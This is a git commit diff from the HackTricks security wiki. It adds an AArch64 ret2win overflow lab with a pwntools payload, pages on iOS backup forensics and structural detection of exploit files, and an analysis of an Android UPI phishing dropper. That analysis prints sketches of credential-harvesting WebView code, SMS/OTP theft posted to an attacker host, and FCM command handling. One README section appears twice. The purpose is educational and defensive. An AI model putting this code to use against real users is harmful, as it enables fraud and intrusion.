Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

This commit is contained in:
carlospolop 2025-08-28 13:44:18 +02:00
commit d102dcc133
30 changed files with 1886 additions and 148 deletions

View File

@ -177,6 +177,15 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(PAYLOAD) # rides the symlink
```
### Deep-dive: Keras .keras deserialization and gadget hunting
For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
{{#ref}}
../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
{{#endref}}
## References
- [OffSec blog "CVE-2024-12029 InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
@ -184,4 +193,4 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
- [PyTorch security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
{{#include ../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -41,6 +41,7 @@
- [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
- [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
- [Image Acquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
- [Ios Backup Forensics](generic-methodologies-and-resources/basic-forensic-methodology/ios-backup-forensics.md)
- [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
- [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
- [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
@ -61,6 +62,7 @@
- [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
- [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
- [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
- [Structural File Format Exploit Detection](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.md)
- [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
- [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
- [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
@ -69,6 +71,7 @@
- [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
- [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
- [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
- [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
- [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
- [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
- [venv](generic-methodologies-and-resources/python/venv.md)

View File

@ -33,9 +33,21 @@ int main() {
Compile without pie and canary:
```bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
```
- The extra flag `-mbranch-protection=none` disables AArch64 Branch Protection (PAC/BTI). If your toolchain defaults to enabling PAC or BTI, this keeps the lab reproducible. To check whether a compiled binary uses PAC/BTI you can:
- Look for AArch64 GNU properties:
- `readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'`
- Inspect prologues/epilogues for `paciasp`/`autiasp` (PAC) or for `bti c` landing pads (BTI):
- `objdump -d ret2win | head -n 40`
### AArch64 calling convention quick facts
- The link register is `x30` (a.k.a. `lr`), and functions typically save `x29`/`x30` with `stp x29, x30, [sp, #-16]!` and restore them with `ldp x29, x30, [sp], #16; ret`.
- This means the saved return address lives at `sp+8` relative to the frame base. With a `char buffer[64]` placed below, the usual overwrite distance to the saved `x30` is 64 (buffer) + 8 (saved x29) = 72 bytes — exactly what we'll find below.
- The stack pointer must remain 16-byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash on function epilogues.
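Putting those numbers together, a minimal sketch of the payload layout (the `win_addr` value below is hypothetical; resolve the real one with `nm`/`objdump`):

```python
from pwn import *

context.arch = 'aarch64'

offset   = 72                 # 64-byte buffer + 8 bytes of saved x29, as derived above
win_addr = 0x4006f4           # hypothetical address of the target function

payload  = b"A" * offset      # filler up to the saved return address
payload += p64(win_addr)      # overwrites saved x30, restored by `ldp x29, x30, [sp], #16; ret`
```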
## Finding the offset
### Pattern option
@ -112,6 +124,8 @@ from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'
# Prepare the payload
offset = 72
@ -187,6 +201,47 @@ print(p.recvline())
p.close()
```
### Notes on modern AArch64 hardening (PAC/BTI) and ret2win
- If the binary is compiled with AArch64 Branch Protection, you may see `paciasp`/`autiasp` or `bti c` emitted in function prologues/epilogues. In that case:
- Returning to an address that is not a valid BTI landing pad may raise a `SIGILL`. Prefer targeting the exact function entry that contains `bti c`.
- If PAC is enabled for returns, naive return-address overwrites may fail because the epilogue authenticates `x30`. For learning scenarios, rebuild with `-mbranch-protection=none` (shown above). When attacking real targets, prefer non-return hijacks (e.g., function pointer overwrites) or build ROP that never executes an `autiasp`/`ret` pair that authenticates your forged LR.
- To check features quickly:
- `readelf --notes -W ./ret2win` and look for `AARCH64_FEATURE_1_BTI` / `AARCH64_FEATURE_1_PAC` notes.
- `objdump -d ./ret2win | head -n 40` and look for `bti c`, `paciasp`, `autiasp`.
### Running on non-ARM64 hosts (qemu-user quick tip)
If you are on x86_64 but want to practice AArch64:
```bash
# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross
# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win
# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'
```
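If you drive the exploit with pwntools, you can also spawn the binary through qemu-user directly from the script (a sketch using the same paths/flags as above):

```python
from pwn import *

context.arch = 'aarch64'

# Run the AArch64 binary under qemu-user from an x86_64 host
p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./ret2win"])

# For debugging, expose the gdbstub instead and attach gdb-multiarch to :1234 as shown above
# p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "./ret2win"])
```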
### Related HackTricks pages
-
{{#ref}}
../../rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
{{#endref}}
-
{{#ref}}
../../rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
{{#endref}}
## References
- Enabling PAC and BTI on AArch64 for Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
- Procedure Call Standard for the Arm 64-bit Architecture (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -23,6 +23,33 @@ malware-analysis.md
If you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
# Basic Forensic Methodology
## Creating and Mounting an Image
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
{{#endref}}
## Malware Analysis
This **isn't necessarily the first step to perform once you have the image**. But you can use these malware analysis techniques independently if you have a file, a file-system image, a memory image, a pcap... so it's good to **keep these actions in mind**:
{{#ref}}
malware-analysis.md
{{#endref}}
## Inspecting an Image
If you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
@ -44,6 +71,60 @@ linux-forensics.md
docker-forensics.md
{{#endref}}
{{#ref}}
ios-backup-forensics.md
{{#endref}}
## Deep inspection of specific file-types and Software
If you have a very **suspicious** **file**, then **depending on the file-type and software** that created it, several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
{{#ref}}
specific-software-file-type-tricks/
{{#endref}}
I want to make a special mention of the page:
{{#ref}}
specific-software-file-type-tricks/browser-artifacts.md
{{#endref}}
## Memory Dump Inspection
{{#ref}}
memory-dump-analysis/
{{#endref}}
## Pcap Inspection
{{#ref}}
pcap-inspection/
{{#endref}}
## **Anti-Forensic Techniques**
Keep in mind the possible use of anti-forensic techniques:
{{#ref}}
anti-forensic-techniques.md
{{#endref}}
## Threat Hunting
{{#ref}}
file-integrity-monitoring.md
{{#endref}}
## Deep inspection of specific file-types and Software
If you have a very **suspicious** **file**, then **depending on the file-type and software** that created it, several **tricks** may be useful.\
@ -93,4 +174,3 @@ file-integrity-monitoring.md
{{#include ../../banners/hacktricks-training.md}}

View File

@ -0,0 +1,132 @@
# iOS Backup Forensics (Messaging-centric triage)
{{#include ../../banners/hacktricks-training.md}}
This page describes practical steps to reconstruct and analyze iOS backups for signs of 0-click exploit delivery via messaging app attachments. It focuses on turning Apple's hashed backup layout into human-readable paths, then enumerating and scanning attachments across common apps.
Goals:
- Rebuild readable paths from Manifest.db
- Enumerate messaging databases (iMessage, WhatsApp, Signal, Telegram, Viber)
- Resolve attachment paths, extract embedded objects (PDF/Images/Fonts), and feed them to structural detectors
## Reconstructing an iOS backup
Backups stored under MobileSync use hashed filenames that are not human-readable. The Manifest.db SQLite database maps each stored object to its logical path.
High-level procedure (sketched in code below):
1) Open Manifest.db and read the file records (domain, relativePath, flags, fileID/hash)
2) Recreate the original folder hierarchy based on domain + relativePath
3) Copy or hardlink each stored object to its reconstructed path
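A minimal Python sketch of the same idea (it assumes the standard `Files` table with `fileID`, `domain`, `relativePath` and `flags` columns, per-file storage under `<backup>/<first two hex chars>/<fileID>`, and an unencrypted backup):

```python
import os, shutil, sqlite3, sys

backup, out = sys.argv[1], sys.argv[2]
db = sqlite3.connect(os.path.join(backup, "Manifest.db"))

for file_id, domain, rel_path, flags in db.execute(
        "SELECT fileID, domain, relativePath, flags FROM Files"):
    if flags != 1 or not rel_path:                      # flags == 1 is commonly a regular file
        continue
    src = os.path.join(backup, file_id[:2], file_id)    # hashed on-disk object
    dst = os.path.join(out, domain, rel_path)           # reconstructed logical path
    if os.path.exists(src):
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(src, dst)                          # copy2 keeps timestamps
```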
Example workflow with a tool that implements this end-to-end (ElegantBouncer):
```bash
# Rebuild the backup into a readable folder tree
$ elegant-bouncer --ios-extract /path/to/backup --output /tmp/reconstructed
[+] Reading Manifest.db ...
✓ iOS backup extraction completed successfully!
```
Notes:
- Handle encrypted backups by supplying the backup password to your extractor
- Preserve original timestamps/ACLs when possible for evidentiary value
## Messaging app attachment enumeration
After reconstruction, enumerate attachments for popular apps. The exact schema varies by app/version, but the approach is similar: query the messaging database, join messages to attachments, and resolve paths on disk.
### iMessage (sms.db)
Key tables: message, attachment, message_attachment_join (MAJ), chat, chat_message_join (CMJ)
Example queries:
```sql
-- List attachments with basic message linkage
SELECT
m.ROWID AS message_rowid,
a.ROWID AS attachment_rowid,
a.filename AS attachment_path,
m.handle_id,
m.date,
m.is_from_me
FROM message m
JOIN message_attachment_join maj ON maj.message_id = m.ROWID
JOIN attachment a ON a.ROWID = maj.attachment_id
ORDER BY m.date DESC;
-- Include chat names via chat_message_join
SELECT
c.display_name,
a.filename AS attachment_path,
m.date
FROM chat c
JOIN chat_message_join cmj ON cmj.chat_id = c.ROWID
JOIN message m ON m.ROWID = cmj.message_id
JOIN message_attachment_join maj ON maj.message_id = m.ROWID
JOIN attachment a ON a.ROWID = maj.attachment_id
ORDER BY m.date DESC;
```
Attachment paths may be absolute or relative to the reconstructed tree under Library/SMS/Attachments/.
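A small helper to map those values onto the reconstructed tree (assuming the layout produced above, where iMessage attachments live in MediaDomain):

```python
import os

def resolve_attachment(att_path, reconstructed_root):
    """Map an attachment.filename value to a file in the reconstructed backup."""
    if att_path.startswith("~/"):
        # e.g. ~/Library/SMS/Attachments/... is stored in MediaDomain in the backup
        return os.path.join(reconstructed_root, "MediaDomain", att_path[2:])
    if os.path.isabs(att_path):
        return att_path                      # already absolute on the analysis box
    return os.path.join(reconstructed_root, att_path)
```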
### WhatsApp (ChatStorage.sqlite)
Common linkage: message table ↔ media/attachment table (naming varies by version). Query media rows to obtain on-disk paths.
Example (generic):
```sql
SELECT
m.Z_PK AS message_pk,
mi.ZMEDIALOCALPATH AS media_path,
m.ZMESSAGEDATE AS message_date
FROM ZWAMESSAGE m
LEFT JOIN ZWAMEDIAITEM mi ON mi.ZMESSAGE = m.Z_PK
WHERE mi.ZMEDIALOCALPATH IS NOT NULL
ORDER BY m.ZMESSAGEDATE DESC;
```
Adjust table/column names to your app version (ZWAMESSAGE/ZWAMEDIAITEM are common in iOS builds).
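To confirm the schema on a given build before writing queries, plain SQLite introspection is enough (no app-specific assumptions):

```python
import sqlite3, sys

db = sqlite3.connect(sys.argv[1])   # e.g. ChatStorage.sqlite
for (table,) in db.execute("SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"):
    cols = [row[1] for row in db.execute(f"PRAGMA table_info({table})")]
    print(table, "->", ", ".join(cols))
```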
### Signal / Telegram / Viber
- Signal: the message DB is encrypted; however, attachments cached on disk (and thumbnails) are usually scannable
- Telegram: inspect cache directories (photo/video/document caches) and map to chats when possible
- Viber: Viber.sqlite contains message/attachment tables with on-disk references
Tip: even when metadata is encrypted, scanning the media/cache directories still surfaces malicious objects.
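A quick way to sweep those directories for scannable media regardless of database encryption (the extension list is just an example starting point):

```python
import os, sys

MEDIA_EXT = {".pdf", ".webp", ".png", ".jpg", ".jpeg", ".gif", ".heic", ".ttf", ".otf", ".dng", ".tif", ".tiff"}

root = sys.argv[1]                      # reconstructed backup or app cache directory
for dirpath, _, files in os.walk(root):
    for name in files:
        if os.path.splitext(name)[1].lower() in MEDIA_EXT:
            print(os.path.join(dirpath, name))   # feed these paths into the structural scanner
```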
## Scanning attachments for structural exploits
Once you have attachment paths, feed them into structural detectors that validate file-format invariants instead of signatures. Example with ElegantBouncer:
```bash
# Recursively scan only messaging attachments under the reconstructed tree
$ elegant-bouncer --scan --messaging /tmp/reconstructed
[+] Found N messaging app attachments to scan
✗ THREAT in WhatsApp chat 'John Doe': suspicious_document.pdf → FORCEDENTRY (JBIG2)
✗ THREAT in iMessage: photo.webp → BLASTPASS (VP8L)
```
Detections covered by structural rules include:
- PDF/JBIG2 FORCEDENTRY (CVE-2021-30860): impossible JBIG2 dictionary states
- WebP/VP8L BLASTPASS (CVE-2023-4863): oversized Huffman table constructions
- TrueType TRIANGULATION (CVE-2023-41990): undocumented bytecode opcodes
- DNG/TIFF CVE-2025-43300: metadata vs. stream component mismatches
## Validation, caveats, and false positives
- Time conversions: iMessage stores dates in Apple epochs/units on some versions; convert appropriately during reporting (see the helper below)
- Schema drift: app SQLite schemas change over time; confirm table/column names per device build
- Recursive extraction: PDFs may embed JBIG2 streams and fonts; extract and scan inner objects
- False positives: structural heuristics are conservative but can flag rare malformed yet benign media
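For example, recent iMessage builds store `message.date` as nanoseconds since the Apple epoch (2001-01-01 UTC), while older ones used seconds; a hedged conversion helper:

```python
from datetime import datetime, timezone, timedelta

APPLE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

def imessage_date(value):
    """Convert message.date to UTC; newer iOS stores nanoseconds, older versions seconds."""
    seconds = value / 1_000_000_000 if value > 1_000_000_000_000 else value
    return APPLE_EPOCH + timedelta(seconds=seconds)
```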
## References
- [ELEGANTBOUNCER: When You Can't Get the Samples but Still Need to Catch the Threat](https://www.msuiche.com/posts/elegantbouncer-when-you-cant-get-the-samples-but-still-need-to-catch-the-threat/)
- [ElegantBouncer project (GitHub)](https://github.com/msuiche/elegant-bouncer)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -35,6 +35,11 @@ pdf-file-analysis.md
{{#endref}}
{{#ref}}
structural-file-format-exploit-detection.md
{{#endref}}
{{#ref}}
png-tricks.md
{{#endref}}
@ -50,5 +55,3 @@ zips-tricks.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -0,0 +1,183 @@
# Structural File-Format Exploit Detection (0-Click Chains)
{{#include ../../../banners/hacktricks-training.md}}
This page summarizes practical techniques to detect 0-click mobile exploit files by validating structural invariants of their formats instead of relying on byte signatures. The approach generalizes across samples, polymorphic variants, and future exploits that abuse the same parser logic.
Key idea: encode structural impossibilities and cross-field inconsistencies that only appear when a vulnerable decoder/parser state is reached.
See also:
{{#ref}}
pdf-file-analysis.md
{{#endref}}
## Why structure, not signatures
When weaponized samples are unavailable and payload bytes mutate, traditional IOC/YARA patterns fail. Structural detection inspects the container's declared layout versus what is mathematically or semantically possible for the format implementation.
Typical checks:
- Validate table sizes and bounds derived from the spec and safe implementations
- Flag illegal/undocumented opcodes or state transitions in embedded bytecode
- Cross-check metadata vs. actual encoded stream components
- Detect contradictory fields that indicate parser confusion or integer overflow setups
Below are concrete, field-tested patterns for multiple high-impact chains.
---
## PDF/JBIG2 FORCEDENTRY (CVE-2021-30860)
Target: JBIG2 symbol dictionaries embedded inside PDFs (often used in mobile MMS parsing).
Structural signals:
- Contradictory dictionary state that cannot occur in benign content but is required to trigger the overflow in arithmetic decoding.
- Suspicious use of global segments combined with abnormal symbol counts during refinement coding.
Pseudo-logic:
```pseudo
# Detecting impossible dictionary state used by FORCEDENTRY
if input_symbols_count == 0 and (ex_syms > 0 and ex_syms < 4):
    mark_malicious("JBIG2 impossible symbol dictionary state")
```
Practical triage:
- Identify and extract JBIG2 streams from the PDF
- pdfid/pdf-parser/peepdf to locate and dump streams
- Verify arithmetic coding flags and symbol dictionary parameters against the JBIG2 spec
Notes:
- Works without embedded payload signatures
- Low FP in practice because the flagged state is mathematically inconsistent
---
## WebP/VP8L BLASTPASS (CVE-2023-4863)
Target: WebP lossless (VP8L) Huffman prefix-code tables.
Structural signals:
- Total size of constructed Huffman tables exceeds the safe upper bound expected by the reference/patched implementations, implying the overflow precondition.
Pseudo-logic:
```pseudo
# Detect malformed Huffman table construction triggering overflow
let total_size = sum(table_sizes)
if total_size > 2954: # example bound: FIXED_TABLE_SIZE + MAX_TABLE_SIZE
    mark_malicious("VP8L oversized Huffman tables")
```
Practical triage:
- Check WebP container chunks: VP8X + VP8L
- Parse VP8L prefix codes and compute actual allocated table sizes
Notes:
- Robust against byte-level polymorphism of the payload
- Bound is derived from upstream limits/patch analysis
---
## TrueType TRIANGULATION (CVE-2023-41990)
Target: TrueType bytecode inside fpgm/prep/glyf programs.
Structural signals:
- Presence of undocumented/forbidden opcodes in Apple's interpreter used by the exploit chain.
Pseudo-logic:
```pseudo
# Flag undocumented TrueType opcodes leveraged by TRIANGULATION
switch opcode:
    case 0x8F, 0x90:
        mark_malicious("Undocumented TrueType bytecode")
    default:
        continue
```
Practical triage:
- Dump font tables (e.g., using fontTools/ttx) and scan fpgm/prep/glyf programs (see the sketch below)
- No need to fully emulate the interpreter to get value from presence checks
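A minimal fontTools-based sketch of the presence check (the opcode list mirrors the pseudo-logic above; note a naive byte scan can also hit push-instruction operands, so treat hits as leads, not verdicts):

```python
from fontTools.ttLib import TTFont

SUSPICIOUS = {0x8F, 0x90}          # undocumented opcodes leveraged by TRIANGULATION

def scan_font(path):
    font = TTFont(path)
    programs = []
    for tag in ("fpgm", "prep"):
        if tag in font:
            programs.append((tag, font[tag].program.getBytecode()))
    if "glyf" in font:
        glyf = font["glyf"]
        for name in glyf.keys():
            glyph = glyf[name]
            if hasattr(glyph, "program") and glyph.program:
                programs.append((f"glyf/{name}", glyph.program.getBytecode()))
    for where, code in programs:
        hits = [hex(b) for b in code if b in SUSPICIOUS]
        if hits:
            print(f"[!] {path}: suspicious opcode(s) {hits} in {where}")
```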
Notes:
- May produce rare FPs if non-standard fonts include unknown opcodes; validate with secondary tooling
---
## DNG/TIFF CVE-2025-43300
Target: DNG/TIFF image metadata vs. actual component count in the encoded stream (e.g., JPEG-Lossless SOF3).
Structural signals:
- Inconsistency between EXIF/IFD fields (SamplesPerPixel, PhotometricInterpretation) and the component count parsed from the image stream header used by the pipeline.
Pseudo-logic:
```pseudo
# Metadata claims 2 samples per pixel but stream header exposes only 1 component
if samples_per_pixel == 2 and sof3_components == 1:
    mark_malicious("DNG/TIFF metadata vs. stream mismatch")
```
Practical triage:
- Parse primary IFD and EXIF tags
- Locate and parse the embedded JPEG-Lossless header (SOF3) and compare component counts (see the sketch below)
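A naive structural sketch of that comparison (IFD0 only; real DNGs often keep the relevant tags in SubIFDs, so production checks must walk those too):

```python
import struct, sys

def samples_per_pixel_ifd0(buf):
    endian = "<" if buf[:2] == b"II" else ">"
    ifd_off = struct.unpack(endian + "I", buf[4:8])[0]
    count = struct.unpack(endian + "H", buf[ifd_off:ifd_off + 2])[0]
    for i in range(count):
        e = ifd_off + 2 + 12 * i
        tag = struct.unpack(endian + "H", buf[e:e + 2])[0]
        if tag == 277:                      # SamplesPerPixel (SHORT, stored inline)
            return struct.unpack(endian + "H", buf[e + 8:e + 10])[0]
    return None

def sof3_components(buf):
    off = buf.find(b"\xff\xc3")             # first JPEG-Lossless SOF3 marker
    return buf[off + 9] if off != -1 else None   # Nf byte: marker(2)+Lf(2)+P(1)+Y(2)+X(2)

buf = open(sys.argv[1], "rb").read()
if samples_per_pixel_ifd0(buf) == 2 and sof3_components(buf) == 1:
    print("[!] metadata vs. stream component mismatch (CVE-2025-43300 pattern)")
```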
Notes:
- Reported exploited in the wild; excellent candidate for structural consistency checks
---
## Implementation patterns and performance
A practical scanner should:
- Auto-detect file type and dispatch only relevant analyzers (PDF/JBIG2, WebP/VP8L, TTF, DNG/TIFF); see the skeleton below
- Stream/partial-parse to minimize allocations and enable early termination
- Run analyses in parallel (thread pool) for bulk triage
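A minimal dispatch skeleton based on magic bytes (the detector callables are placeholders for the structural checks described above):

```python
import os, sys

def sniff(head):
    if head.startswith(b"%PDF"):
        return "pdf_jbig2"
    if head[:4] == b"RIFF" and head[8:12] == b"WEBP":
        return "webp_vp8l"
    if head[:4] in (b"\x00\x01\x00\x00", b"true", b"ttcf", b"OTTO"):
        return "truetype"
    if head[:2] in (b"II", b"MM"):
        return "tiff_dng"
    return None

DETECTORS = {}   # e.g. {"webp_vp8l": check_vp8l_tables, ...} -- plug in the analyzers above

def scan(path):
    with open(path, "rb") as f:
        kind = sniff(f.read(16))
    detector = DETECTORS.get(kind)
    return detector(path) if detector else None

for dirpath, _, files in os.walk(sys.argv[1]):
    for name in files:
        scan(os.path.join(dirpath, name))
```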
Example workflow with ElegantBouncer (open-source Rust implementation of these checks):
```bash
# Scan a path recursively with structural detectors
$ elegant-bouncer --scan /path/to/directory
# Optional TUI for parallel scanning and real-time alerts
$ elegant-bouncer --tui --scan /path/to/samples
```
---
## DFIR tips and edge cases
- Embedded objects: PDFs may embed images (JBIG2) and fonts (TrueType); extract and recursively scan
- Decompression safety: use libraries that hard-limit tables/buffers before allocation
- False positives: keep rules conservative, favor contradictions that are impossible under the spec
- Version drift: rebaseline bounds (e.g., VP8L table sizes) when upstream parsers change limits
---
## Related tools
- ElegantBouncer: structural scanner for the detections above
- pdfid/pdf-parser/peepdf: PDF object extraction and static analysis
- pdfcpu: PDF linter/sanitizer
- fontTools/ttx: dump TrueType tables and bytecode
- exiftool: read TIFF/DNG/EXIF metadata
- dwebp/webpmux: parse WebP metadata and chunks
---
## References
- [ELEGANTBOUNCER: When You Can't Get the Samples but Still Need to Catch the Threat](https://www.msuiche.com/posts/elegantbouncer-when-you-cant-get-the-samples-but-still-need-to-catch-the-threat/)
- [ElegantBouncer project (GitHub)](https://github.com/msuiche/elegant-bouncer)
- [Researching FORCEDENTRY: Detecting the exploit with no samples](https://www.msuiche.com/posts/researching-forcedentry-detecting-the-exploit-with-no-samples/)
- [Researching BLASTPASS: Detecting the exploit inside a WebP file (Part 1)](https://www.msuiche.com/posts/researching-blastpass-detecting-the-exploit-inside-a-webp-file-part-1/)
- [Researching BLASTPASS: Analysing the Apple & Google WebP PoC file (Part 2)](https://www.msuiche.com/posts/researching-blastpass-analysing-the-apple-google-webp-poc-file-part-2/)
- [Researching TRIANGULATION: Detecting CVE-2023-41990 with single-byte signatures](https://www.msuiche.com/posts/researching-triangulation-detecting-cve-2023-41990-with-single-byte-signatures/)
- [CVE-2025-43300: Critical vulnerability found in Apple's DNG image processing](https://www.msuiche.com/posts/cve-2025-43300-critical-vulnerability-found-in-apples-dng-image-processing/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -90,9 +90,143 @@ Java.perform(function() {
LubanCompress 1.1.8 # "Luban" string inside classes.dex
```
---
## Android WebView Payment Phishing (UPI) Dropper + FCM C2 Pattern
This pattern has been observed in campaigns abusing government-benefit themes to steal Indian UPI credentials and OTPs. Operators chain reputable platforms for delivery and resilience.
### Delivery chain across trusted platforms
- YouTube video lure → description contains a short link
- Shortlink → GitHub Pages phishing site imitating the legit portal
- Same GitHub repo hosts an APK with a fake “Google Play” badge linking directly to the file
- Dynamic phishing pages live on Replit; remote command channel uses Firebase Cloud Messaging (FCM)
### Dropper with embedded payload and offline install
- First APK is an installer (dropper) that ships the real malware at `assets/app.apk` and prompts the user to disable WiFi/mobile data to blunt cloud detection.
- The embedded payload installs under an innocuous label (e.g., “Secure Update”). After install, both the installer and the payload are present as separate apps.
Static triage tip (grep for embedded payloads):
```bash
unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head
```
### Dynamic endpoint discovery via shortlink
- Malware fetches a plain-text, comma-separated list of live endpoints from a shortlink; simple string transforms produce the final phishing page path.
Example (sanitised):
```
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" → "gate.htm" (loaded in WebView)
UPI credential POST: https://sqcepo.replit.app/addup.php
SMS upload: https://sqcepo.replit.app/addsm.php
```
Pseudo-code:
```java
String csv = httpGet(shortlink);
String[] parts = csv.split(",");
String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");
```
### WebView-based UPI credential harvesting
- The “Make payment of ₹1 / UPILite” step loads an attacker HTML form from the dynamic endpoint inside a WebView and captures sensitive fields (phone, bank, UPI PIN) which are `POST`ed to `addup.php`.
Minimal loader:
```java
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
```
### Self-propagation and SMS/OTP interception
- Aggressive permissions are requested on first run:
```xml
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
```
- Contacts are looped to mass-send smishing SMS from the victim's device.
- Incoming SMS are intercepted by a broadcast receiver and uploaded with metadata (sender, body, SIM slot, per-device random ID) to `/addsm.php`.
Receiver sketch:
```java
public void onReceive(Context c, Intent i){
    SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
    for (SmsMessage m: msgs){
        postForm(urlAddSms, new FormBody.Builder()
            .add("senderNum", m.getOriginatingAddress())
            .add("Message", m.getMessageBody())
            .add("Slot", String.valueOf(getSimSlot(i)))
            .add("Device rand", getOrMakeDeviceRand(c))
            .build());
    }
}
```
### Firebase Cloud Messaging (FCM) as resilient C2
- The payload registers to FCM; push messages carry a `_type` field used as a switch to trigger actions (e.g., update phishing text templates, toggle behaviours).
Example FCM payload:
```json
{
  "to": "<device_fcm_token>",
  "data": {
    "_type": "update_texts",
    "template": "New subsidy message..."
  }
}
```
Handler sketch:
```java
@Override
public void onMessageReceived(RemoteMessage msg){
    String t = msg.getData().get("_type");
    switch (t){
        case "update_texts": applyTemplate(msg.getData().get("template")); break;
        case "smish": sendSmishToContacts(); break;
        // ... more remote actions
    }
}
```
### Hunting patterns and IOCs
- APK contains secondary payload at `assets/app.apk`
- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php`
- SMS exfiltration to `/addsm.php`
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints
- Apps labelled as generic “Update/Secure Update”
- FCM `data` messages with a `_type` discriminator in untrusted apps
### Detection & defence ideas
- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`.
- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure.
- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field.
---
## References
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
- [Luban Android image compression library](https://github.com/Curzibn/Luban)
